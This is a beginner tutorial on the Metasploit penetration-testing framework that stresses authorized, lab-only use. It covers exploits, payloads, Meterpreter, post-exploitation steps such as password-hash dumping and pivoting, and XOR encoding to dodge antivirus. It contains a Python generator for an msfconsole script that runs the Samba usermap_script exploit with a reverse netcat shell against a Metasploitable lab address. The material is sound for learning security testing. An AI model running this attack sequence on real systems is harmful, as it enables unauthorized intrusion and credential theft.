Metasploit is one of the most widely used frameworks for penetration testing. It lets you act like an attacker, under controlled conditions, to see whether your defenses actually work.
Think of a computer network like a massive office building with thousands of doors and windows.
If you own this building, you want to make sure every door is locked. But how can you be sure? You hire a security guard to walk around and physically push on every single door handle.
Metasploit is the ultimate toolkit for that security guard.
Instead of pushing on doors with their hands, the guard uses Metasploit. It is a giant collection of digital tools designed to check if a computer system has open doors, weak locks, or broken windows.
The Broken Lock
A vulnerability is a mistake or a bug in a computer system. It is the exact spot where the defense is weak. It is the broken lock on the back door of the building.
The Skeleton Key
An exploit is a specific piece of code used to break through that exact vulnerability. If the vulnerability is the broken lock, the exploit is the tool used to pick it.
The Package
The payload is what you do *after* you break the lock. It is the code that runs inside the system once the door is open. It might give you control of the computer or let you look around.
1. Scan the network to see which computers are turned on and what software they are running.
2. Look in Metasploit's module list for an exploit that matches the software the target is running.
3. Decide what you want to happen once you are in. Do you want a command screen? Do you want to add a user?
4. Run the test. Metasploit sends the exploit, opens the door, and drops the payload inside.
Metasploit is powerful because it comes with a built-in library of modules. It knows about thousands of past mistakes made by software vendors, and users can search that library instantly to find the exact module they need.
We talked about payloads earlier. The most famous payload in Metasploit is called Meterpreter.
When you break into a system with an ordinary shell, every tool you run leaves a trail on disk and in the process list. Meterpreter is different. It is a command screen that lives entirely in the memory of the process you exploited, talks back to you over an encrypted channel, and loads extra features (screenshots, file transfer, password dumping) into that same process on demand. It is quieter than a normal shell, not invisible: memory scanners and network monitoring can still spot it.
meterpreter > sysinfo
Computer        : TARGET-SERVER-01
OS              : Windows Server
Architecture    : x64
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Getting in is only the first step. Metasploit has a whole section of modules dedicated to what you do next. This is called "Post-Exploitation". Here is what testers do to prove the system is at risk:
* Dump the list of user accounts and password hashes from that computer to see whether any passwords are weak or reused elsewhere.
* Take a screenshot of the desktop to prove they have full access to the machine.
* Use the compromised computer as a bridge (a "pivot") to reach other computers hidden deep inside the building.
* Check whether they could erase the system logs so the computer would keep no record of their visit. In an authorized test this is usually only demonstrated, not done: the logs are the owner's evidence, and the rules of engagement normally forbid destroying them.
Metasploit organizes its modules into a few types:
* Exploits: The battering rams. Programs that take advantage of a specific weakness to break into a system.
* Payloads: The cargo. The code that actually runs on the target system after the exploit opens the door.
* Auxiliary: The binoculars. Scanners and tools used to look around and gather information without actually attacking.
* Encoders: The disguises. Tools that transform the payload's bytes so that simple pattern matching does not recognize it.
* Post: The follow-up kit. Modules that run on a machine you already control, such as screenshots, credential dumping, and pivoting.
Imagine a hospital hires a security tester to check their systems. Here is how they use Metasploit:
The tester uses an Auxiliary module to scan the hospital's network. They find an old computer running a very old version of Windows.
They search Metasploit for an Exploit that works on that old Windows version. They attach a Meterpreter Payload to it.
They fire the attack. The exploit works, and the tester gets a command screen on their laptop. They are inside the old computer.
The tester takes a screenshot to prove they got in. They stop the test, write a report, and the hospital updates the old computer to fix the broken lock.
Metasploit was created in 2003 by a programmer named H.D. Moore. It started as a free, open-source project—meaning anyone in the world could help build it.
Eventually, a security company called Rapid7 purchased the project. However, they kept the core engine free. Today, a massive community of researchers still adds new exploits to it every single day.
Metasploit Framework (free, open source)
The original tool. It is controlled entirely by typing commands into a terminal. It has no buttons or menus. You must know what you are doing.
Metasploit Pro (paid enterprise tool)
The version sold to large companies. It adds a web interface with buttons, graphs, and automatic report generators. Under the hood it drives the same free engine.
Professionals control Metasploit using a tool called msfconsole. It is a text-only screen where you type instructions. When you launch it, you see a summary of all the tools loaded and a flashing cursor waiting for your command.
+-------------------------------------------------------+
| METASPLOIT FRAMEWORK |
+-------------------------------------------------------+
=[ metasploit v6.3.5 ]
+ -- --=[ 2294 exploits - 1201 auxiliary - 409 payloads ]
msf6 > _
With thousands of exploits, you need a way to filter them. Metasploit has a built-in search command that accepts filters such as type, platform, name, and CVE number.
Example command:
search type:exploit platform:windows
This tells Metasploit: "Show me all the modules that are exploits designed to attack a Windows system."
When you load an exploit, you must tell it exactly where to go and where to report back. You do this by setting two crucial variables.
Remote Host (Their Address)
This is the IP address of the computer you are testing. It tells the exploit exactly which building to attack. Current versions of Metasploit call this option RHOSTS (it can hold a range or a list of targets) and still accept RHOST as an alias.
set RHOST 192.168.1.50
Local Host (Your Address)
This is your computer's IP address. When the door opens, the payload needs to know where to phone home.
set LHOST 192.168.1.10
A Session is an active connection to a target. If you break into 3 different computers, you have 3 sessions running.
You can put these sessions in the background, like minimizing a window on your desktop, and jump between them whenever you want without losing access.
msf6 > sessions -l
Workspaces
If you are testing a hospital on Monday and a bank on Tuesday, you do not want the data to mix. Workspaces act like separate project folders to keep all your found hosts, services, and bugs completely isolated.
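The four-step workflow above, together with the RHOST/LHOST settings and the session and workspace commands, can be replayed from a "resource script": a text file of msfconsole commands that you run with msfconsole -q -r file.rc. The following Python is an added example, not code from the page or from the Metasploit project; it generates such a script and refuses to write one if an address is malformed. It assumes a lab target at 192.168.56.101 (a Metasploitable 2 VM, which ships with the Samba "username map script" flaw that exploit/multi/samba/usermap_script targets) and a tester machine at 192.168.56.1; those addresses and the workspace name are made up for the example, while the module and option names are real Metasploit ones.

```python
"""Added example (not Metasploit's own code): build an msfconsole resource
script that replays scan -> pick exploit -> pick payload -> run against a
lab target, inside its own workspace.

Assumed, not from the page: target 192.168.56.101 is a Metasploitable 2 VM
(vulnerable Samba on port 139) and the tester's machine is 192.168.56.1.
"""
import ipaddress
from pathlib import Path


def build_rc(rhost: str, lhost: str, lport: int = 4444,
             workspace: str = "lab_metasploitable2") -> str:
    """Return the text of a resource script, or raise ValueError on bad input.

    Validate first: a typo in RHOSTS would aim the test at the wrong building,
    which is exactly what the written authorization does not cover.
    """
    ipaddress.ip_address(rhost)          # raises ValueError if not an IP
    ipaddress.ip_address(lhost)
    if not 1 <= lport <= 65535:
        raise ValueError(f"bad port {lport}")
    lines = [
        "# 0. Keep this engagement's findings apart from other clients' data",
        f"workspace -a {workspace}",
        "# 1. Scan: which hosts answer and what is listening (auxiliary module)",
        "use auxiliary/scanner/portscan/tcp",
        f"set RHOSTS {rhost}",
        "set PORTS 21,22,80,139,445",
        "run",
        "# 2. Pick the exploit that matches the discovered service (Samba on 139)",
        "use exploit/multi/samba/usermap_script",
        f"set RHOSTS {rhost}",
        "# 3. Choose the payload and tell it where to phone home",
        "set PAYLOAD cmd/unix/reverse_netcat",
        f"set LHOST {lhost}",
        f"set LPORT {lport}",
        "# 4. Run it; -z keeps the new session in the background",
        "exploit -z",
        "sessions -l",
    ]
    return "\n".join(lines) + "\n"


def write_rc(path: str, rhost: str, lhost: str, **options) -> Path:
    """Write the script to disk and return its path."""
    out = Path(path)
    out.write_text(build_rc(rhost, lhost, **options))
    return out


if __name__ == "__main__":
    rc = write_rc("lab.rc", "192.168.56.101", "192.168.56.1")
    print(f"wrote {rc}; replay it with: msfconsole -q -r {rc}")
```

Lines starting with # are comments in a resource script, so the generated file documents which step each command belongs to. Because the payload is a reverse connection, LHOST must be an address the target can actually reach; on a host-only lab network that is the tester's interface on that network, not the machine's public address.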
Typing commands is hard for beginners. Because of this, Raphael Mudge built Armitage, a separate add-on that draws a visual map of the network on your screen and drives msfconsole for you.
Computers look like little monitor icons. When you successfully break into one, the monitor turns red and gets lightning bolts around it, showing you exactly what you control. Armitage is no longer actively maintained, so most professionals learn the console directly.
Antivirus programs look for known patterns of bytes. If a payload on disk matches a known pattern, the antivirus blocks it. Metasploit's Encoders transform the payload bytes (for example, XOR-ing them with a key) and prepend a small decoder that restores them in memory right before they run. Two caveats a tester should know: encoders were built mainly to avoid "bad characters" that a vulnerable program would mangle (a NUL byte that ends a string, a newline that ends a line), not to beat antivirus, and the decoder itself is a fixed pattern, so modern antivirus recognizes common encoders and watches what the code does once it is unscrambled. Encoding alone rarely gets a payload past current defenses.
(Figure: payload blocked by antivirus; scrambled by encoder; unscrambled and run inside.)
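To make the two caveats concrete, here is an added example (not Metasploit code) of a toy single-byte XOR encoder. It shows that the original bytes really do vanish from the encoded blob, that a key can be chosen to avoid bad characters such as NUL and newline, and that the decoder stub stays constant across every key, which is why it can be signatured. The payload bytes and the four-byte stub marker are constructed placeholders, not real machine code.

```python
"""Added example: a toy XOR encoder in the spirit of Metasploit's encoders.

PAYLOAD and STUB_MAGIC are constructed stand-ins, not executable code: a real
encoder emits machine instructions that perform xor_decode at run time.
"""

# Constructed fake payload containing a "signature" a scanner might match on.
PAYLOAD = b"\x90\x90\x90EVIL_SHELL\x00\xcc\xcc"
SIGNATURE = b"EVIL_SHELL"
# Stand-in for the decoder stub; in a real encoder this is the part that
# never changes between keys, and therefore the part a scanner can match.
STUB_MAGIC = b"\xfa\xce\xde\xc0"
# Bytes that commonly break the path into a vulnerable program: NUL, LF, CR.
DEFAULT_BAD_CHARS = b"\x00\x0a\x0d"


def xor_encode(payload: bytes, key: int) -> bytes:
    """Return stub || key || payload XOR key."""
    if not 1 <= key <= 255:
        raise ValueError("key must be a non-zero byte")
    body = bytes(b ^ key for b in payload)
    return STUB_MAGIC + bytes([key]) + body


def xor_decode(blob: bytes) -> bytes:
    """What the stub does at run time: read the key, undo the XOR."""
    if not blob.startswith(STUB_MAGIC) or len(blob) < len(STUB_MAGIC) + 1:
        raise ValueError("no decoder stub")
    key = blob[len(STUB_MAGIC)]
    return bytes(b ^ key for b in blob[len(STUB_MAGIC) + 1:])


def pick_key(payload: bytes, bad_chars: bytes = DEFAULT_BAD_CHARS) -> int:
    """The original job of an encoder: find a key whose output (key byte
    included) contains none of the bytes the target would mangle."""
    for key in range(1, 256):
        candidate = bytes([key]) + bytes(b ^ key for b in payload)
        if not any(c in candidate for c in bad_chars):
            return key
    raise ValueError("no single-byte key avoids all bad characters")


def looks_malicious(blob: bytes) -> bool:
    """A naive 'antivirus': match on the plaintext signature OR on the stub.
    The second rule is why encoding alone does not defeat real scanners."""
    return SIGNATURE in blob or STUB_MAGIC in blob


if __name__ == "__main__":
    key = pick_key(PAYLOAD)
    encoded = xor_encode(PAYLOAD, key)
    print(f"key=0x{key:02x} signature hidden={SIGNATURE not in encoded} "
          f"still flagged by stub rule={looks_malicious(encoded)}")
    assert xor_decode(encoded) == PAYLOAD
```

Running it shows the signature gone from the encoded bytes while looks_malicious still fires, because the stub is the same in every output. Real encoders such as shikata_ga_nai randomize their stub somewhat, which is why they lasted longer against pattern matching, but behavioral detection of the decoded payload in memory does not care what the stub looked like.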
You should never test systems you do not own. So how do you learn? Rapid7, the company that maintains Metasploit, publishes a deliberately vulnerable virtual machine called Metasploitable. It is a system built entirely out of broken locks. You download it, run it inside a virtual machine on an isolated network on your own computer, and practice attacking it without breaking any laws.
Never attack a system you do not own.
Metasploit is a tool. Like a hammer, you can use it to build a house or break a window. Professionals use Metasploit for Ethical Hacking. This means they only test systems when the owner has given them strict, written permission. The goal is always to find the hole and fix it before the bad guys find it.